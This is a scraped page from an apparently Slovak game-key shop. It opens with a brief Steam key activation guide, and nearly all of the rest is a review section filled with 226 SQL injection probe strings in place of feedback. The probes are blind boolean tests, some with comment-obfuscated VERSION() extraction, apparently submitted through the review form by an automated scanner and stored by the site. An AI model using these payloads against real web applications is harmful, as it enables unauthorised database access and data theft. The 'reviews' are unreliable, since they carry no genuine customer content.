Top Category
Naše posledné novinky

Ako aktivovať hru na STEAM

Ako aktivovať hru na STEAM

AKTIVÁCIA PRODUKTU STEAM

1. AKTIVÁCIA kľúča STEAM

Prihláste sa do svojho účtu Steam

akoaktivovatsteam

2. Kliknite na \"PRIDAŤ HRU ...\" v ľavom dolnom rohu

akoaktivovatsteam

3. Kliknite na „Aktivovať produkt v službe Steam ...“

akoaktivovatsteam

4. Kliknite na "ĎALEJ"

akoaktivovatsteam

5. Kliknite na „Súhlasím“

akoaktivovatsteam

6. Zadajte kód hry a kliknite na „ĎALEJ“

akoaktivovatsteam

7. Pokračujte v inštalácii dvojitým kliknutím na hru vo vašej knižnici.

akoaktivovatsteam

Všetka spätná väzba
 1. Smith" AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 2. Smith" AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 3. Smith" AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 4. Smith" AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 5. Smith" AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 6. Smith" AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 7. Smith" AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 8. Smith" AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 9. Smith" AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 10. Smith" AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 11. Smith' AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 12. Smith' AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 13. Smith' AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 14. Smith' AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 15. Smith' AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 16. Smith' AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 17. Smith' AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 18. Smith' AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 19. Smith' AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 20. Smith' AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 21. -1 AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 22. -1 AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 23. -1 AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 24. -1 AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 25. -1 AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 26. -1 AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 27. -1 AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 28. -1 AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 29. -1 AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 30. -1 AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 31. -1 OR 1=1 AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 32. -1 OR 1=1 AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 33. -1 OR 1=1 AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 34. -1 OR 1=1 AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 35. -1 OR 1=1 AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 36. -1 OR 1=1 AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 37. -1 OR 1=1 AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 38. -1 OR 1=1 AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 39. -1 OR 1=1 AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 40. -1 OR 1=1 AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 41. Smith"OR 1=1 AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 42. Smith"OR 1=1 AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 43. Smith"OR 1=1 AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 44. Smith"OR 1=1 AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 45. Smith"OR 1=1 AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 46. Smith"OR 1=1 AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 47. Smith"OR 1=1 AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 48. Smith"OR 1=1 AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 49. Smith"OR 1=1 AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 50. Smith"OR 1=1 AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 51. Smith'OR 1=1 AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 52. Smith'OR 1=1 AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 53. Smith'OR 1=1 AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 54. Smith'OR 1=1 AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 55. Smith'OR 1=1 AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 56. Smith'OR 1=1 AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 57. Smith'OR 1=1 AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 58. Smith'OR 1=1 AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 59. Smith'OR 1=1 AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 60. Smith'OR 1=1 AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 61. -1 OR 1=1) AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 62. -1 OR 1=1) AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 63. -1 OR 1=1) AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 64. -1 OR 1=1) AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 65. -1 OR 1=1) AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 66. -1 OR 1=1) AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 67. -1 OR 1=1) AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 68. -1 OR 1=1) AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 69. -1 OR 1=1) AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 70. -1 OR 1=1) AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 71. Smith"OR 1=1) AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 72. Smith"OR 1=1) AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 73. Smith"OR 1=1) AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 74. Smith"OR 1=1) AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 75. Smith"OR 1=1) AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 76. Smith"OR 1=1) AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 77. Smith"OR 1=1) AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 78. Smith"OR 1=1) AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 79. Smith"OR 1=1) AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 80. Smith"OR 1=1) AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 81. Smith'OR 1=1) AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 82. Smith'OR 1=1) AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 83. Smith'OR 1=1) AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 84. Smith'OR 1=1) AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 85. Smith'OR 1=1) AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 86. Smith'OR 1=1) AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 87. Smith'OR 1=1) AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 88. Smith'OR 1=1) AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 89. Smith'OR 1=1) AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 90. Smith'OR 1=1) AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 91. -1 OR 1=1)) AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 92. -1 OR 1=1)) AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 93. -1 OR 1=1)) AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 94. -1 OR 1=1)) AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 95. -1 OR 1=1)) AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 96. -1 OR 1=1)) AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 97. -1 OR 1=1)) AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 98. -1 OR 1=1)) AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 99. -1 OR 1=1)) AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 100. -1 OR 1=1)) AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 101. Smith"OR 1=1)) AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 102. Smith"OR 1=1)) AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 103. Smith"OR 1=1)) AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 104. Smith"OR 1=1)) AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 105. Smith"OR 1=1)) AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 106. Smith"OR 1=1)) AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 107. Smith"OR 1=1)) AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 108. Smith"OR 1=1)) AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 109. Smith"OR 1=1)) AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 110. Smith"OR 1=1)) AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 111. Smith'OR 1=1)) AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 112. Smith'OR 1=1)) AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 113. Smith'OR 1=1)) AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 114. Smith'OR 1=1)) AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 115. Smith'OR 1=1)) AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 116. Smith'OR 1=1)) AND ASC(MID((Now()),1,1))>25
  Recenzované dňa

  3

 117. Smith'OR 1=1)) AND ASC(MID((Now()),1,1))=1
  Recenzované dňa

  3

 118. Smith'OR 1=1)) AND ASC(MID((Now()),1,1))>255
  Recenzované dňa

  3

 119. Smith'OR 1=1)) AND ASC(MID((Now()),1,1))
  Recenzované dňa

  3

 120. Smith'OR 1=1)) AND ASC(MID((Now()),1,1))>0
  Recenzované dňa

  3

 121. Smith"/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25
  Recenzované dňa

  3

 122. Smith"/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1
  Recenzované dňa

  3

 123. Smith"/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255
  Recenzované dňa

  3

 124. Smith"/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 125. Smith"/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0
  Recenzované dňa

  3

 126. Smith"/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25--
  Recenzované dňa

  3

 127. Smith"/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1--
  Recenzované dňa

  3

 128. Smith"/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255--
  Recenzované dňa

  3

 129. Smith"/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 130. Smith"/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0--
  Recenzované dňa

  3

 131. Smith'/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25
  Recenzované dňa

  3

 132. Smith'/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1
  Recenzované dňa

  3

 133. Smith'/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255
  Recenzované dňa

  3

 134. Smith'/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 135. Smith'/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0
  Recenzované dňa

  3

 136. Smith'/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25--
  Recenzované dňa

  3

 137. Smith'/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1--
  Recenzované dňa

  3

 138. Smith'/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255--
  Recenzované dňa

  3

 139. Smith'/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 140. Smith'/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0--
  Recenzované dňa

  3

 141. -1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25
  Recenzované dňa

  3

 142. -1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1
  Recenzované dňa

  3

 143. -1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255
  Recenzované dňa

  3

 144. -1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 145. -1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0
  Recenzované dňa

  3

 146. -1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25--
  Recenzované dňa

  3

 147. -1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1--
  Recenzované dňa

  3

 148. -1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255--
  Recenzované dňa

  3

 149. -1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 150. -1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0--
  Recenzované dňa

  3

 151. -1/**/OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25
  Recenzované dňa

  3

 152. -1/**/OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1
  Recenzované dňa

  3

 153. -1/**/OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255
  Recenzované dňa

  3

 154. -1/**/OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 155. -1/**/OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0
  Recenzované dňa

  3

 156. -1/**/OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25--
  Recenzované dňa

  3

 157. -1/**/OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1--
  Recenzované dňa

  3

 158. -1/**/OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255--
  Recenzované dňa

  3

 159. -1/**/OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 160. -1/**/OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0--
  Recenzované dňa

  3

 161. Smith"OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25
  Recenzované dňa

  3

 162. Smith"OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1
  Recenzované dňa

  3

 163. Smith"OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255
  Recenzované dňa

  3

 164. Smith"OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 165. Smith"OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0
  Recenzované dňa

  3

 166. Smith"OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25--
  Recenzované dňa

  3

 167. Smith"OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1--
  Recenzované dňa

  3

 168. Smith"OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255--
  Recenzované dňa

  3

 169. Smith"OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 170. Smith"OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0--
  Recenzované dňa

  3

 171. Smith'OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25
  Recenzované dňa

  3

 172. Smith'OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1
  Recenzované dňa

  3

 173. Smith'OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255
  Recenzované dňa

  3

 174. Smith'OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 175. Smith'OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0
  Recenzované dňa

  3

 176. Smith'OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25--
  Recenzované dňa

  3

 177. Smith'OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1--
  Recenzované dňa

  3

 178. Smith'OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255--
  Recenzované dňa

  3

 179. Smith'OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 180. Smith'OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0--
  Recenzované dňa

  3

 181. -1/**/OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25
  Recenzované dňa

  3

 182. -1/**/OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1
  Recenzované dňa

  3

 183. -1/**/OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255
  Recenzované dňa

  3

 184. -1/**/OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 185. -1/**/OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0
  Recenzované dňa

  3

 186. -1/**/OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25--
  Recenzované dňa

  3

 187. -1/**/OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1--
  Recenzované dňa

  3

 188. -1/**/OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255--
  Recenzované dňa

  3

 189. -1/**/OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 190. -1/**/OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0--
  Recenzované dňa

  3

 191. Smith"OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25
  Recenzované dňa

  3

 192. Smith"OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1
  Recenzované dňa

  3

 193. Smith"OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255
  Recenzované dňa

  3

 194. Smith"OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 195. Smith"OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0
  Recenzované dňa

  3

 196. Smith"OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25--
  Recenzované dňa

  3

 197. Smith"OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1--
  Recenzované dňa

  3

 198. Smith"OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255--
  Recenzované dňa

  3

 199. Smith"OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 200. Smith"OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0--
  Recenzované dňa

  3

 201. Smith'OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25
  Recenzované dňa

  3

 202. Smith'OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1
  Recenzované dňa

  3

 203. Smith'OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255
  Recenzované dňa

  3

 204. Smith'OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 205. Smith'OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0
  Recenzované dňa

  3

 206. Smith'OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25--
  Recenzované dňa

  3

 207. Smith'OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1--
  Recenzované dňa

  3

 208. Smith'OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255--
  Recenzované dňa

  3

 209. Smith'OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 210. Smith'OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0--
  Recenzované dňa

  3

 211. -1/**/OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25
  Recenzované dňa

  3

 212. -1/**/OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1
  Recenzované dňa

  3

 213. -1/**/OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255
  Recenzované dňa

  3

 214. -1/**/OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 215. -1/**/OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0
  Recenzované dňa

  3

 216. -1/**/OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25--
  Recenzované dňa

  3

 217. -1/**/OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1--
  Recenzované dňa

  3

 218. -1/**/OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255--
  Recenzované dňa

  3

 219. -1/**/OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 220. -1/**/OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0--
  Recenzované dňa

  3

 221. Smith"OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25
  Recenzované dňa

  3

 222. Smith"OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1
  Recenzované dňa

  3

 223. Smith"OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255
  Recenzované dňa

  3

 224. Smith"OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)
  Recenzované dňa

  3

 225. Smith"OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0
  Recenzované dňa

  3

 226. Smith"OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25--
  Recenzované dňa

  3

